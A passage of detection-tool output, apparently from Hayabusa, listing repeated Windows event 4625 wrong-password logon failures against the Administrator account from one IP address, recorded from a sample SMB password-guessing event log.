| 793 | 2016-09-20 01:50:12.772 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 794 | 2016-09-20 01:50:12.811 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 795 | 2016-09-20 01:50:12.847 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 796 | 2016-09-20 01:50:12.891 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 797 | 2016-09-20 01:50:12.927 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 798 | 2016-09-20 01:50:12.963 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 799 | 2016-09-20 01:50:12.996 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 800 | 2016-09-20 01:50:13.045 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 801 | 2016-09-20 01:50:13.088 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 802 | 2016-09-20 01:50:13.125 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 803 | 2016-09-20 01:50:13.156 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 804 | 2016-09-20 01:50:13.195 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 805 | 2016-09-20 01:50:13.236 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 806 | 2016-09-20 01:50:13.280 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 807 | 2016-09-20 01:50:13.324 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 808 | 2016-09-20 01:50:13.364 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 809 | 2016-09-20 01:50:13.412 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 810 | 2016-09-20 01:50:13.447 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 811 | 2016-09-20 01:50:13.487 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 812 | 2016-09-20 01:50:13.528 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 813 | 2016-09-20 01:50:13.564 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 814 | 2016-09-20 01:50:13.612 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 815 | 2016-09-20 01:50:13.652 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 816 | 2016-09-20 01:50:13.683 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 817 | 2016-09-20 01:50:13.720 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 818 | 2016-09-20 01:50:13.759 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 819 | 2016-09-20 01:50:13.796 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 820 | 2016-09-20 01:50:13.834 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 821 | 2016-09-20 01:50:13.860 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 822 | 2016-09-20 01:50:13.895 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 823 | 2016-09-20 01:50:13.935 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 824 | 2016-09-20 01:50:13.976 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 825 | 2016-09-20 01:50:14.008 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 826 | 2016-09-20 01:50:14.052 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 827 | 2016-09-20 01:50:14.088 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 828 | 2016-09-20 01:50:14.124 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 829 | 2016-09-20 01:50:14.159 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 830 | 2016-09-20 01:50:14.189 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 831 | 2016-09-20 01:50:14.228 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 832 | 2016-09-20 01:50:14.304 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 833 | 2016-09-20 01:50:14.345 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 834 | 2016-09-20 01:50:14.389 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 835 | 2016-09-20 01:50:14.427 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 836 | 2016-09-20 01:50:14.468 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 837 | 2016-09-20 01:50:14.503 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 838 | 2016-09-20 01:50:14.543 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 839 | 2016-09-20 01:50:14.597 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 840 | 2016-09-20 01:50:14.637 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 841 | 2016-09-20 01:50:14.673 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 842 | 2016-09-20 01:50:14.708 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 843 | 2016-09-20 01:50:14.748 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 844 | 2016-09-20 01:50:14.788 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 845 | 2016-09-20 01:50:14.824 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 846 | 2016-09-20 01:50:14.868 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 847 | 2016-09-20 01:50:14.905 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 848 | 2016-09-20 01:50:14.950 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 849 | 2016-09-20 01:50:15.004 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 850 | 2016-09-20 01:50:15.056 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 851 | 2016-09-20 01:50:15.096 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 852 | 2016-09-20 01:50:15.128 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 853 | 2016-09-20 01:50:15.168 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 854 | 2016-09-20 01:50:15.211 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 855 | 2016-09-20 01:50:15.254 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 856 | 2016-09-20 01:50:15.289 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 857 | 2016-09-20 01:50:15.337 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 858 | 2016-09-20 01:50:15.380 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 859 | 2016-09-20 01:50:15.420 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 860 | 2016-09-20 01:50:15.456 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 861 | 2016-09-20 01:50:15.504 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 862 | 2016-09-20 01:50:15.554 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 863 | 2016-09-20 01:50:15.595 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
